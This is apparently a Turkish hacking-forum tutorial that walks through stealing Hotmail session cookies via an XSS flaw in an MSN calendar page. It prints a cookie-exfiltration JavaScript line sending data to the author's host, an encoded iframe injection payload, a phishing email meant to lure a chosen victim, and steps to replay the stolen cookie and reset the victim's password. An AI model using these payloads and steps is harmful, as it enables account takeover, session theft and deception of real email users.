Mail Hack’in en qüzel yöntemlerinden olan Hotmail XSS açığını anlatalım..
Öncelikle dosyalarımızı rar’a attığım şekilde kendi hostumuza atıyoruz..Ve bu dosyaları kendi sitemize qöre editliyoruz.. ama ilk önce dosyalar arasında "c.js" var.. bunu not defterinde açın ve ;
i=new/**/Image();i.src= "http://www.volqan.org/portal/sistem/s.php? +">i=new/**/Image();i.src= "http://www.volqan.org/portal/log.php? +">
şu kısmı bulup " voLqan.Org " linkini kendi sitenizin adıyla editleyin ve bu şekilde kaydedin.. Daha sonra tüm dosyaları rar’ladığım şekilde hostunuza atın.. Detaya inmek istiyorum dosyanın içinde log.php dosyasını yani portal/system/log.php’yi kendinize qöre editleyebilirisiniz.. Mesela orda snif’ten cookie bilqilerini almak için kullanıcı adı ve şifre " admin - voLqan " şeklinde.. Yani ;
$kullaniciadi = "admin";
$sifre = "voLqan";
bunu kendinize qöre uyarlayabilirsiniz.. Böylece cookie’leri aldığınız log sayfası yalnızca size ait olur ve her qirişte " kullanıcı adı - şifre " ister..
Bu dosyamızı da kendimize qöre ayarladıktan sonra sıra qeldi XSS’mizi kullanmaya.. Bu XSS’i kendi sitemde " portal " klasörüne kurduğumu düşünürsem, kurbana yollayacağım link ;
www.volqan.org/portal olacaktır.. Çünkü o klasöre attığım index.html’deki kod yani ;
**********document.write(’<iframe name="I1" src= "a target=_blank href=http://calendar.msn.com/tasks/isapi">http://calendar.msn.com/tasks/isapi.dll?request=action&operation=expandcollapse& objectID=0&itemOldStatus=0&httpFrom=“><%53%43%52%4 9%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77% 77%2E%6B%67%73%63%65%6E%74%65%72%2E%6F%72%67%2F%70 %6F%72%74%61%6C%2F%63%2E%6A%73><%2F%53%43%52%49%50 %54>" height="1" width="1" border="0" frameborder="0" marginwidth="1" marginheight="1" style="position: absolute; left: 0; top: 0"> hi</iframe>’)
window.status=" "
</script>
bu kod kurban’ın bu sayfayı qörmesi halinde cookie bilqilerinin elime qeçmesini sağlayacaktır..
kurbanımı seçiyorum ve ona kendi mail hesabımdan şöyle bir mail qönderiyorum..
Konu : yeni portal nasıl olmuş
Kimden :
[email protected]
Konu : merhaba arkadaşım voLqan.Org’a qüzel bir portal kurdum seninde yorumlarını bekliyorum..
www.volqan.org/portal Sağ alt taraftaki kategoriye iyi baq
seninde adın qeciyor.. Teşekkürler..
qibisinden kurbana mailimi yolluyorum
Kurbanımız bu iletiyi alıp verdiğim linke qirdiği anda yani Hotmail box’ı açık iken
www.volqan.org/portal kısmına qirdiği anda Cookie’leri bizim log’umuzda beliriyor
ve bende hemen
www.voLqan.Org/portal/sistem/log.php? adresime qidip cookie’leri kontrol ediyorum..
ve qördüğünüz qibi kurbanın cookie bilqileri qelmiş
şimdi ordaki KOPYALA kutucuğunu tıklaıp cookie’i kopyalıyorum ve proxomitron proqramıma qirip son ayarlarımı yapıyorum
http://img295.imageshack.us/img295/4183/sniffzv5.jpg
ve son olarak proxy ayarlarını yaptıktan sonra aldığımız cookie ile
http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes
linkinden kurbanın mailine qiriş yapıyoruz..Şifreyi kendimize qöre ayarlamak içinde
www.passport.com dan şifre resetleme linkini yolluyoruz ve mail box açıkken şifreyi resetleyip kendimize qöre ayarlıyoruz..
Proxomitron Download
Hotmail XSS Dosyaları Download
işte Hotmail XSS mevzusu bundan ibaret..Yalnız Hotmail XSS acığı kapandı qibi laflar ortada dolaşıyor.. Hotmail’de XSS bulmak bizim elimizde
yani mesela bu verdiğim XSS acığı calendar.hotmail..’den kaynaklanıyor ama hotmail’de bir sürü sub var ve bu sub’larda bir sürü XSS acığı mevcut
her qeçen qün ayrı bir sub’da XSS bulunuyor ve bizde bunu mail hack olarak kullanıyoruz..